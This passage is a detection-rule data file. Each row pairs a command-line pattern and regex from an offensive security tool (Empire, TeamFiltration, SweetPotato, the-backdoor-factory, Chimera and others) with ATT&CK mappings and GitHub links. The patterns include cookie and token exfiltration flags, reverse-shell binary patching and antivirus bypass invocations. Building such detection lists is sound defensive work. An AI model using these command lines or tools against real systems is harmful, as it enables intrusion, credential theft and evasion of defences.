*",".{0,1000}\s\-ExeArguments\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* exec * -p * -c *",".{0,1000}\sexec\s.{0,1000}\s\-p\s.{0,1000}\s\-c\s.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - 
T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "* exec * --pid * --command *",".{0,1000}\sexec\s.{0,1000}\s\-\-pid\s.{0,1000}\s\-\-command\s.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "* exec -dll *.dll -config *.config*",".{0,1000}\sexec\s\-dll\s.{0,1000}\.dll\s\-config\s.{0,1000}\.config.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "* exec-command -clear*",".{0,1000}\sexec\-command\s\-clear.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* exec-command -command *",".{0,1000}\sexec\-command\s\-command\s.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* exec-command -shell*",".{0,1000}\sexec\-command\s\-shell.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* -exec-shellcode *",".{0,1000}\s\-exec\-shellcode\s.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "* execute *NT AUTHORITY\SYSTEM*cmd /c *",".{0,1000}\sexecute\s.{0,1000}NT\sAUTHORITY\\SYSTEM.{0,1000}cmd\s\/c\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "* execute NT AUTHORITY\SYSTEM* cmd true bypass*",".{0,1000}\sexecute\sNT\sAUTHORITY\\SYSTEM.{0,1000}\scmd\strue\sbypass.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "* execute_shellcode.exe*",".{0,1000}\sexecute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --execution false --save True --output *.bin*",".{0,1000}\s\-\-execution\sfalse\s\-\-save\sTrue\s\-\-output\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "* exegol.apk*",".{0,1000}\sexegol\.apk.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* exegol.py*",".{0,1000}\sexegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* exe-selfdelete*",".{0,1000}\sexe\-selfdelete.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "* --exfil --cookie-dump * --all*",".{0,1000}\s\-\-exfil\s\-\-cookie\-dump\s\s.{0,1000}\s\-\-all.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --exfil --cookie-dump *",".{0,1000}\s\-\-exfil\s\-\-cookie\-dump\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --exfil --teams --owa --owa-limit*",".{0,1000}\s\-\-exfil\s\-\-teams\s\-\-owa\s\-\-owa\-limit.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --exfil --teams --owa*",".{0,1000}\s\-\-exfil\s\-\-teams\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --exfil --tokens * --onedrive --owa*",".{0,1000}\s\-\-exfil\s\-\-tokens\s.{0,1000}\s\-\-onedrive\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --exfil --tokens * --onedrive*",".{0,1000}\s\-\-exfil\s\-\-tokens\s.{0,1000}\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* Exfil.sh*",".{0,1000}\sExfil\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* exfilGui.ps1*",".{0,1000}\sexfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "* exfiltrate.exe*",".{0,1000}\sexfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "* exocet.go *.exe*",".{0,1000}\sexocet\.go\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "* --exploit=DCOM*",".{0,1000}\s\-\-exploit\=DCOM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* --exploit=DCOM*",".{0,1000}\s\-\-exploit\=DCOM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation 
from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* --exploit=EfsRpc*",".{0,1000}\s\-\-exploit\=EfsRpc.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* --exploit=PrintSpoofer*",".{0,1000}\s\-\-exploit\=PrintSpoofer.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* --exploit=WinRM*",".{0,1000}\s\-\-exploit\=WinRM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* Exrop(*/bin/*",".{0,1000}\sExrop\(.{0,1000}\/bin\/.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "* ExtensionSpoof.exe*",".{0,1000}\sExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - 
TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "* extract --secrets --zsh*",".{0,1000}\sextract\s\-\-secrets\s\-\-zsh.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "* extract_wifi.exe*",".{0,1000}\sextract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* -f *.bin -e AMSI*",".{0,1000}\s\-f\s.{0,1000}\.bin\s\-e\sAMSI.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "* -f *.bin -e Defender*",".{0,1000}\s\-f\s.{0,1000}\.bin\s\-e\sDefender.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "* -f *.exe --encrypt xor --jmp -o 
*.exe*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-\-encrypt\sxor\s\-\-jmp\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memory without a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "* -f *.exe -m onionduke -b *.dll*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-m\sonionduke\s\-b\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* -f *.exe -m onionduke -b *.exe*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-m\sonionduke\s\-b\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*",".{0,1000}\s\-f\s.{0,1000}\.ps1\s\-l\s3\s\-o\s.{0,1000}\.ps1\s\-v\s\-t\spowershell.{0,1000}reverse.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* -f Find-AllVulns*",".{0,1000}\s\-f\sFind\-AllVulns.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C#
program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Find-PathDLLHijack*",".{0,1000}\s\-f\sFind\-PathDLLHijack.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Get-DomainGroupMember* -a *-Identity *admin* -Recurse*",".{0,1000}\s\-f\sGet\-DomainGroupMember.{0,1000}\s\-a\s.{0,1000}\-Identity\s.{0,1000}admin.{0,1000}\s\-Recurse.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Invoke-Inveigh*",".{0,1000}\s\-f\sInvoke\-Inveigh.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f kirbi *",".{0,1000}\s\-f\skirbi\s.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation 
Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* -f nessus.nessus *",".{0,1000}\s\-f\snessus\.nessus\s.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "* -f passw -e xlsx csv *",".{0,1000}\s\-f\spassw\s\-e\sxlsx\scsv\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* -f passw user admin account network login logon cred *",".{0,1000}\s\-f\spassw\suser\sadmin\saccount\snetwork\slogin\slogon\scred\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares.
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* -f psexec.exe -H * -P * -s reverse_shell_tcp*",".{0,1000}\s\-f\spsexec\.exe\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\sreverse_shell_tcp.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* -f raw -e none -o Nova_MSG.bin*",".{0,1000}\s\-f\sraw\s\-e\snone\s\-o\sNova_MSG\.bin.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "* -f shells/generic1.ps1 *",".{0,1000}\s\-f\sshells\/generic1\.ps1\s.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*",".{0,1000}\s\-f\stcpview\.exe\s\-s\siat_reverse_tcp_inline\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-m\sautomatic\s\-C.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* -f TeamViewer.exe -H * -P * -s *",".{0,1000}\s\-f\sTeamViewer\.exe\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\s.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* fake small keys before real ones""*",".{0,1000}\sfake\ssmall\skeys\sbefore\sreal\sones\"".{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation 
Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "* --fakealias www.fake.com*",".{0,1000}\s\-\-fakealias\swww\.fake\.com.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* -FakeCmdLine *",".{0,1000}\s\-FakeCmdLine\s.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "* -FakeCmdLine *",".{0,1000}\s\-FakeCmdLine\s.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "* -FakeDC * -SamAccountName * -Username *",".{0,1000}\s\-FakeDC\s.{0,1000}\s\-SamAccountName\s.{0,1000}\s\-Username\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation 